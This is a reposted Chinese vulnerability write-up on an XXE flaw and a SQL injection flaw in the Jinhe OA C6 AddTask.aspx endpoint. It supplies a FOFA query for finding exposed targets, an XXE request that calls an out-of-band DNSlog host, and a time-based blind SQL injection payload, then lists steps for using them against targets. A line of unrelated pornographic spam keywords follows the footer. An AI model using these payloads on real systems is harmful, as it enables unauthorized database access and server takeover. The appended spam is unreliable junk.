LOGO OA教程 ERP教程 模切知識交流 PMS教程 CRM教程 開發文檔 其他文檔  
 
網站管理員

金和OA AddTask.aspx XXE漏洞+SQL注入漏洞

admin
2025年7月17日 21:42 本文熱度 396

漏洞說明:

金和網絡是專業信息化服務商,為城市監管部門提供了互聯網+監管解決方案,為企事業單位提供組織協同OA系統開發平臺,電子政務一體化平臺,智慧電商平臺等服務。金和OA C6 AddTask.aspx 接口處存在SQL注入漏洞,同時該接口還存在XXE漏洞,攻擊者除了可以利用 SQL 注入漏洞獲取數據庫中的信息(例如,管理員后臺密碼、站點的用戶個人信息)之外,甚至在高權限的情況可向服務器中寫入木馬,進一步獲取服務器系統權限。

漏洞類型:

命令執行和數據注入

漏洞特征:

FOFA:app="金和網絡-金和OA" || body="/c6/Jhsoft.Web.dailytaskmanage/AddTask.aspx"

POC:

xxe命令執行poc,需要dnslog外帶回顯

POST /c6/Jhsoft.Web.dailytaskmanage/AddTask.aspx/ HTTP/1.1Content-Type: application/xmlHost: xxx.comContent-Length: 134<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://DNSURL">%remote;]><root/>

時間盲注poc,需要查看時間

POST /c6/Jhsoft.Web.dailytaskmanage/AddTask.aspx/ HTTP/1.1Content-Type: application/xmlHost: xxx.comContent-Length: 229<root>  <Page>    <PageName>TaskDetect</PageName>  </Page>  <StartTime>2023-01-01 00:00:00</StartTime>  <EndTime>2023-01-01 00:00:00</EndTime>  <TaskExecutorID>3');WAITFOR DELAY'0:0:5'-- </TaskExecutorID></root>

滲透過程:

通過漏洞特征在FOFA找到目標

通過xxepoc,查詢到dnslog有記錄

通過時間盲注poc,觀察到結果返回時間>5000


閱讀原文:原文鏈接


該文章在 2025/7/18 10:40:58 編輯過
關鍵字查詢
相關文章
正在查詢...
點晴ERP是一款針對中小制造業的專業生產管理軟件系統,系統成熟度和易用性得到了國內大量中小企業的青睞。
點晴PMS碼頭管理系統主要針對港口碼頭集裝箱與散貨日常運作、調度、堆場、車隊、財務費用、相關報表等業務管理,結合碼頭的業務特點,圍繞調度、堆場作業而開發的。集技術的先進性、管理的有效性于一體,是物流碼頭及其他港口類企業的高效ERP管理信息系統。
點晴WMS倉儲管理系統提供了貨物產品管理,銷售管理,采購管理,倉儲管理,倉庫管理,保質期管理,貨位管理,庫位管理,生產管理,WMS管理系統,標簽打印,條形碼,二維碼管理,批號管理軟件。
點晴免費OA是一款軟件和通用服務都免費,不限功能、不限時間、不限用戶的免費OA協同辦公管理系統。
Copyright 2010-2025 ClickSun All Rights Reserved

黄频国产免费高清视频,久久不卡精品中文字幕一区,激情五月天AV电影在线观看,欧美国产韩国日本一区二区
日韩色老头中文字幕 | 五月天精品视频在线观看 | 最新日本一区二区三区视频 | 亚洲成年人免费AV | 在线看片国产在线看片 | 午夜久久两性视频 |